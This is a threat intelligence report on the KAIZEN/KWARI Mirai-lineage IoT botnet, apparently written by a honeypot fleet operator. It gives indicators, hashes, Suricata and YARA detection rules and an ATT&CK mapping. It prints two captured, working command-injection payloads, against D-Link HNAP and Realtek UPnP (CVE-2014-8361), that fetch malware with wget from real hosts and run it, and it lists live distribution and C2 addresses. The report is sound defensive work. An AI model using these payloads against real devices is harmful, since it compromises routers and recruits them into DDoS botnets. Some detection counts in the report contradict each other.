KAIZEN/KWARI Botnet — cowrAI Threat Intelligence

Executive Summary

Between 2026-05-25 and 2026-06-23, the cowrAI honeypot fleet observed a coordinated IoT exploitation campaign distributing Mirai-lineage binaries under two distinct naming conventions: kaizen.* and kwari.*. The campaign targets embedded devices via two pre-authentication remote code execution vulnerabilities: a D-Link DSL-2750B syslog command injection (140 events, 19 scanner IPs) and the well-known Realtek miniigd UPnP SOAP injection (CVE-2014-8361, 51 events, 12 scanner IPs).

Sandbox detonation of kwari.x86 and kwari.mips confirmed live C2 connectivity to 185.234.100.154:2310, the same IP serving binary downloads, with both samples running for the full 300-second observation window and generating 13–14 MB of C2 beacon traffic.

Infrastructure is actively expanding: a fourth distribution node (196.251.121.142) was observed today (2026-06-23) serving the latest kaizen.arm7 build. The dual naming and separate distribution paths suggest either two operators sharing C2 infrastructure or a single operator using naming to track separate exploitation campaigns. The defense_evasion triage tag — unusual for run-of-the-mill Mirai forks — warrants attention.

Threat Actor Profile

Campaign name	KAIZEN / KWARI (operator self-reference via binary names)
Malware family	Mirai-lineage IoT botnet
Classification	DDoS botnet; possible proxy/spam capability (full triage pending)
Sophistication	Low–medium. Known public CVEs; novel binary (no AV coverage). C2 co-located with distrib server.
Target devices	D-Link DSL-2750B routers; Realtek SDK-based CPE (routers, NAS, IP cameras)
Architecture coverage	ARM (4 variants), MIPS BE, MIPS LE, x86, SPARC, Renesas SH4
Entry vector	Unauthenticated pre-auth RCE (no credentials required)
C2 protocol	TCP/2310 to `185.234.100.154` (Mirai-standard C2 port range)
First observed	2026-05-25
Last observed	2026-06-23 (today; new distribution node added)
Reporting basis	TLP:CLEAR — publish freely

Infrastructure

SCANNERS                           DISTRIBUTION NODES
────────────────────               ────────────────────────────────────────
176.65.139.22  (D-Link HNAP)  ──▶  83.142.209.46    /a3f8d2/kaizen.*    (first seen 2026-06-15)
177.22.44.30   (Realtek UPnP) ──▶  176.65.149.168   /bins/kaizen.arm7   (first seen 2026-06-06)
51.158.101.255 (Realtek UPnP) ──▶  185.234.100.154  /Binary/kwari.*     (first seen 2026-06-10)
                               ──▶  196.251.121.142  /a3f8d2/kaizen.arm7 (NEW — 2026-06-23)
                                        │
CVE PAYLOADS                            │ binary fetch (HTTP)
─────────────                           ▼
D-Link HNAP inject                 Target device
  /HNAP1/ POST                          │
  remote_host=;cd /tmp;wget...          │ executes binary
  chmod 777; ./kaizen.arm7              │ selfrep arg: "realtek"
                                        │
Realtek UPnP SOAP inject               ▼
  NewInternalClient backtick       C2 SERVER: 185.234.100.154:2310  ◀── SAME HOST AS kwari.* distrib
  `cd /tmp; wget ...; ./...`           Mirai TCP C2 (300s+ sessions observed)
                                        13–14 MB beacon pcap per session

Notable: the kwari binary distribution server (185.234.100.154) doubles as the confirmed C2 endpoint (:2310). This single-host pattern is operationally simple but fragile — one takedown removes both distribution and C2.

Malware Analysis

13 unique binaries collected. Key samples (kwari.x86, kwari.mips, kaizen.arm7) submitted to VirusTotal on 2026-06-23 and returned 40–44/62 detections — AV engines recognize this as a Mirai variant. The campaign value lies in the infrastructure intelligence (4 distribution nodes, confirmed C2, D-Link HNAP vector) rather than AV evasion.

Filename	Architecture	Size	VT Detections	Triage Score	Tags	SHA256 (prefix)
kaizen.arm7	ELF 32-bit LSB ARM	140,584 B	40 / 63	10	defense_evasion, discovery	b3f594...
kaizen.arm7	ELF 32-bit LSB ARM	140,584 B	27 / 62	10	—	e8aef7...
kaizen.arm7	ELF 32-bit LSB ARM	140,584 B	0 / 62	—	—	24f414...
kaizen.mips	ELF 32-bit MSB MIPS	311,032 B	—	—	—	15495d...
kwari.x86	ELF 32-bit LSB x86	53,852 B	44 / 62	10	botnet:kaizen	370883...
kwari.mips	ELF 32-bit MSB MIPS	75,836 B	43 / 62	10	botnet:kaizen	bf6be1...
kwari.spc	ELF 32-bit MSB SPARC	61,076 B	0 / 62	10	botnet:kaizen	ae3011...
kwari.sh4	ELF 32-bit LSB Renesas SH	51,968 B	0 / 62	10	mirai	aa1cab...
kwari.arm	ELF 32-bit LSB ARM	58,432 B	0 / 62	10	botnet:kaizen	e2fd09...
kwari.arm7	ELF 32-bit LSB ARM	131,489 B	0 / 62	10	botnet:kaizen	a57093...
kwari.arm6	ELF 32-bit LSB ARM	70,788 B	0 / 62	10	botnet:kaizen	bc390b...
kwari.arm5	ELF 32-bit LSB ARM	51,392 B	0 / 62	10	botnet:kaizen	fb6e1f...
kwari.mpsl	ELF 32-bit LSB MIPS	76,476 B	0 / 62	10	botnet:kaizen	166046...

Sandbox Detonation Results

Two samples (kwari.x86, kwari.mips) successfully detonated in isolated WARP-egress sandbox. Both ran for the full 300-second observation window and immediately contacted C2.

Sample	Exit	Runtime	PCAP	C2 Endpoint
kwari.x86 (370883...)	killed (timeout)	300s	13,687,104 B	185.234.100.154:2310
kwari.mips (bf6be1...)	killed (timeout)	300s	14,454,780 B	185.234.100.154:2310

ARM samples did not detonate (x86-only sandbox). 13–14 MB of C2 beacon traffic per session is characteristic of Mirai keeping-alive with DDoS target lists.

Defense Evasion Tag — Unusual for Mirai Forks

tria.ge flags kaizen.arm7 with defense_evasion alongside standard discovery and botnet:kaizen tags. Vanilla Mirai forks typically only trigger execution and c2 tags. Defense evasion suggests possible anti-analysis code (VM detection, sleep-before-connect, or signal-based anti-debugging) not present in the canonical Mirai codebase. Further static analysis warranted.

Captured Exploit Payloads

Vector 1 — D-Link DSL-2750B HNAP Syslog Command Injection

Scanner: 176.65.139.22. Targets the HNAP remote syslog configuration endpoint. The remote_host parameter accepts shell metacharacters without sanitization. URL-encoded semicolons (%3b) terminate the expected value and inject arbitrary commands. No authentication required.

POST /HNAP1/ HTTP/1.1
SOAPAction: "http://purenetworks.com/HNAP1/SetSyslogSettings"
Content-Type: text/xml

remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&
LogFlag=0&remote_host=%3bcd+/tmp;wget+http://83.142.209.46/a3f8d2/kaizen.arm7;
chmod+777+kaizen.arm7;./kaizen.arm7;rm+-rf+kaizen.arm7%3b%2

Decoded injection: ; cd /tmp; wget http://83.142.209.46/a3f8d2/kaizen.arm7; chmod 777 kaizen.arm7; ./kaizen.arm7; rm -rf kaizen.arm7

Vector 2 — Realtek miniigd UPnP SOAP Injection (CVE-2014-8361)

Scanners: 177.22.44.30, 176.65.139.22. Targets Realtek SDK UPnP daemon (port 52869 or 37215). The NewInternalClient SOAP field is passed to a shell without sanitization. Backtick injection executes arbitrary commands as root. Binary launched with arg realtek for Mirai-style self-replication tracking.

POST /picsdesc.xml HTTP/1.1
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"

<NewInternalClient>`cd /tmp; rm -rf kaizen.mips; wget http://83.142.209.46/a3f8d2/kaizen.mips;
chmod 777 kaizen.mips; ./kaizen.mips realtek`</NewInternalClient>

The realtek arg in ./kaizen.mips realtek follows Mirai convention: argv[1] identifies the infection vector for operator reporting.

Campaign Timeline

2026-05-25

First KAIZEN/KWARI activity captured

Initial Realtek SOAP injection payload observed. First binaries retrieved.
2026-06-06

Secondary distribution node added

176.65.149.168 begins serving kaizen.arm7 at /bins/. Possible geographic expansion.
2026-06-10

kwari.* samples first observed; C2 confirmed via sandbox

185.234.100.154 distributing kwari.* binaries; sandbox detonation confirms C2 at :2310. 13–14 MB per-session pcap.
2026-06-15

kaizen.arm7 variant submitted to sandbox

ARM detonation unsuccessful (x86 sandbox). VT: 0 detections.
2026-06-23 (today)

Fourth distribution node observed — infrastructure actively expanding

196.251.121.142 (Apache/2.4.52 Ubuntu) serving kaizen.arm7 at /a3f8d2/. HTTP 200 confirmed. New kaizen build.

MITRE ATT&CK Mapping

T1190

Exploit Public-Facing Application

D-Link HNAP syslog injection + Realtek CVE-2014-8361 UPnP SOAP injection. Both unauthenticated pre-auth RCE.

T1059.004

Command and Scripting: Unix Shell

Backtick injection into Realtek SOAP field; semicolon-chained commands in HNAP payload.

T1105

Ingress Tool Transfer

wget fetches binary to /tmp after initial shell access. Architecture-specific binary selection.

T1027

Obfuscated Files or Information

tria.ge defense_evasion tag on kaizen.arm7. Possible anti-analysis techniques absent from base Mirai.

T1016

System Network Configuration Discovery

tria.ge discovery tag; Mirai-standard network interface enumeration for DDoS source selection.

T1498

Network Denial of Service

Primary botnet function. C2 at :2310 issues DDoS commands; 13–14 MB continuous beacon traffic per sandbox session.

T1070.004

Indicator Removal: File Deletion

Payload ends with rm -rf kaizen.arm7 after execution — removes binary from disk.

T1584

Compromise Infrastructure

Four distribution nodes observed; C2 co-located with kwari distribution server. Possible compromised VPS infrastructure.

Indicators of Compromise

Network — Scanner IPs

IP	Role	CVE Vector
176.65.139.22	Primary scanner	D-Link HNAP syslog injection + Realtek CVE-2014-8361
177.22.44.30	Realtek scanner	CVE-2014-8361 UPnP SOAP
51.158.101.255	Realtek scanner	CVE-2014-8361 UPnP SOAP

Network — Distribution & C2 IPs

IP	Role	Path / Port	First Seen
83.142.209.46	kaizen.* distribution	`/a3f8d2/kaizen.*`	2026-06-15
176.65.149.168	kaizen.* distribution (secondary)	`/bins/kaizen.arm7`	2026-06-06
185.234.100.154	kwari.* distribution + C2	`/Binary/kwari.*` · TCP:2310	2026-06-10
196.251.121.142	kaizen.* distribution (NEW)	`/a3f8d2/kaizen.arm7`	2026-06-23

Network — URLs

URL	Binary
http://83.142.209.46/a3f8d2/kaizen.arm7	ARM7 botnet ELF
http://83.142.209.46/a3f8d2/kaizen.mips	MIPS BE botnet ELF
http://176.65.149.168/bins/kaizen.arm7	ARM7 botnet ELF (secondary)
http://185.234.100.154/Binary/kwari.*	Multi-arch kwari binaries
http://196.251.121.142/a3f8d2/kaizen.arm7	ARM7 botnet ELF (newest)

Files — SHA256 Hashes

SHA256	Filename	VT
b3f59415949a6a17ba9e2859fe727bec1d375227e685c92ecd61bb8e73e531a7	kaizen.arm7	40/63
15495d978314cbc03ed3014e9987f134bfc56d811d8ad819039d3a5792f829b6	kaizen.mips	—
e8aef7c572007e2c5aa3954f590822ed1c077698100b9924af825dab1cf91902	kaizen.arm7	27/62
24f4143e26c9d07571084a1a6abbcf4828f8325457c8461531e43b3e04829c48	kaizen.arm7	0
370883f9f6e88309dffc8b89bdbcfa3dae339bf2d7e41986eac5505a0ae14cbd	kwari.x86	44/62
bf6be1b8b100bc3ca6763f0d7e412108ed3fd60f05f2e5aec2042be3f1cda66d	kwari.mips	43/62
ae3011372b07bb2860589c959324f7ad48d7db350a10104c40e871a17be924bd	kwari.spc	0
aa1cab94fc4be8078649d0a8cc23e48e7d8394190be844df243afa819fb2936f	kwari.sh4	0
e2fd0927ebfb811830610c4cc26bd08066fa94427ed8c3838fc7a5d70724588b	kwari.arm	0
a570938e00ba22ed95e64cf214b3215f86056411bf7c3452bbc5431591e35b07	kwari.arm7	0
bc390bbf8ab84102c08cfec67a32393b20644b2ed35b293ba752e24f4a2ccdd6	kwari.arm6	0
fb6e1f32318f2b5504f0a2d6a942fc570c1145b944b261fd184c3d3b98f9ce42	kwari.arm5	0
166046807bb1f4e33c77eff2bc0eead70f1935dcdac9b07845b8aa482e3b2500	kwari.mpsl	0

File Artifacts

Artifact	Location	Notes
kaizen.{arm7,mips,...}	/tmp/	Written then deleted after exec (rm -rf in payload)
kwari.{x86,mips,arm,...}	/tmp/	Distributed from separate IP; no self-deletion observed in payload

Detection Signatures

SURICATA — D-Link HNAP Payload Pattern

alert http $EXTERNAL_NET any -> $HOME_NET any (
  msg:"cowrAI KAIZEN D-Link HNAP Syslog Command Injection";
  flow:to_server,established;
  http.method; content:"POST";
  http.uri; content:"/HNAP1/";
  http.request_body; content:"remote_submit_Flag=1"; content:"remote_host=%3b";
  classtype:attempted-admin;
  reference:url,cowrai-intel-reports.pages.dev/kaizen-botnet/;
  sid:9100001; rev:1;
)

SURICATA — Realtek UPnP SOAP Injection (CVE-2014-8361)

alert http $EXTERNAL_NET any -> $HOME_NET 52869 (
  msg:"cowrAI KAIZEN Realtek UPnP SOAP Command Injection CVE-2014-8361";
  flow:to_server,established;
  http.method; content:"POST";
  http.request_body; content:"NewInternalClient"; content:"kaizen"; nocase;
  classtype:attempted-admin;
  reference:cve,2014-8361;
  reference:url,cowrai-intel-reports.pages.dev/kaizen-botnet/;
  sid:9100002; rev:1;
)

SURICATA — Binary Download Detection (kaizen.* / kwari.*)

alert http $HOME_NET any -> $EXTERNAL_NET any (
  msg:"cowrAI KAIZEN/KWARI Binary Download";
  flow:to_server,established;
  http.uri; content:"/kaizen."; nocase;
  reference:url,cowrai-intel-reports.pages.dev/kaizen-botnet/;
  sid:9100003; rev:1;
)

alert http $HOME_NET any -> $EXTERNAL_NET any (
  msg:"cowrAI KWARI Binary Download";
  flow:to_server,established;
  http.uri; content:"/kwari."; nocase;
  reference:url,cowrai-intel-reports.pages.dev/kaizen-botnet/;
  sid:9100004; rev:1;
)

SURICATA — C2 Beacon (185.234.100.154:2310)

alert tcp $HOME_NET any -> 185.234.100.154 2310 (
  msg:"cowrAI KAIZEN/KWARI C2 Beacon to Confirmed C2 Endpoint";
  flow:to_server,established;
  classtype:trojan-activity;
  reference:url,cowrai-intel-reports.pages.dev/kaizen-botnet/;
  sid:9100005; rev:1;
)

YARA — Binary Family Heuristic

rule KAIZEN_KWARI_IoT_Botnet {
    meta:
        author      = "cowrAI Honeypot Fleet"
        description = "KAIZEN/KWARI Mirai-lineage IoT botnet (zero VT as of 2026-06-23)"
        date        = "2026-06-23"
        tlp         = "CLEAR"

    strings:
        $name1 = "kaizen" ascii nocase
        $name2 = "kwari"  ascii nocase
        $mirai1 = "/proc/net/tcp" ascii
        $mirai2 = "PRIVMSG" ascii
        $path1  = "/a3f8d2/" ascii
        $path2  = "/Binary/" ascii

    condition:
        uint32(0) == 0x464c457f and
        (any of ($name*) or all of ($mirai*)) and
        filesize < 400KB
}

Attribution Notes

Distinct from FROSTY Campaign

The FROSTY campaign (also tracked by this fleet) shares the Realtek CVE-2014-8361 vector but is otherwise distinct: FROSTY additionally exploits CVE-2017-17215 (Huawei HG532), uses entirely different distribution infrastructure, carries 41/62 VT detections (vs 0 here), and routes C2 through a separate IP space. Binary naming conventions (frosty.* vs kaizen.*/kwari.*), distribution paths, and C2 endpoints are all different. These are unrelated operators.

Attribute	KAIZEN/KWARI	FROSTY
CVE vectors	D-Link HNAP + Realtek CVE-2014-8361	Realtek CVE-2014-8361 + Huawei CVE-2017-17215
VT detections	40–44 / 62 (key samples, 2026-06-23)	41 / 62
C2 endpoint	`185.234.100.154:2310`	Separate IP space
D-Link HNAP vector	Yes (140 events, primary vector)	No

Dual Naming Hypothesis

The kaizen.* and kwari.* naming across separate distribution IPs suggests either: (a) two operators sharing the same C2 infrastructure at 185.234.100.154:2310, each naming their build separately, or (b) a single operator using naming to differentiate exploitation campaigns (kaizen = CVE-targeted, kwari = SSH brute-force). The co-located C2 endpoint favors (b). The Japanese word "kaizen" (改善, continuous improvement) as a botnet name is an unusual choice.

Collection Methodology

Data collected passively by the cowrAI distributed honeypot fleet — 36 cowrie 2.9.17 nodes across multiple providers in Europe, North America, and Asia-Pacific. Nodes run SSH/Telnet lures plus 9 alt-protocol lure daemons including soaplure (ports 7547, 37215, 52869) which captured both CVE payloads.

Binaries are automatically retrieved by a chase-runner sidecar (5-minute polling interval), SHA256-hashed, stored in R2, and submitted to VirusTotal and tria.ge. Confirmed samples are detonated in an isolated sandbox using WARP-egress with network capture.

This brief was generated from live sensor data collected between 2026-05-25 and 2026-06-23. All IOCs are derived from direct honeypot captures — no third-party threat feed enrichment.

KAIZEN / KWARI — IoT Botnet Campaign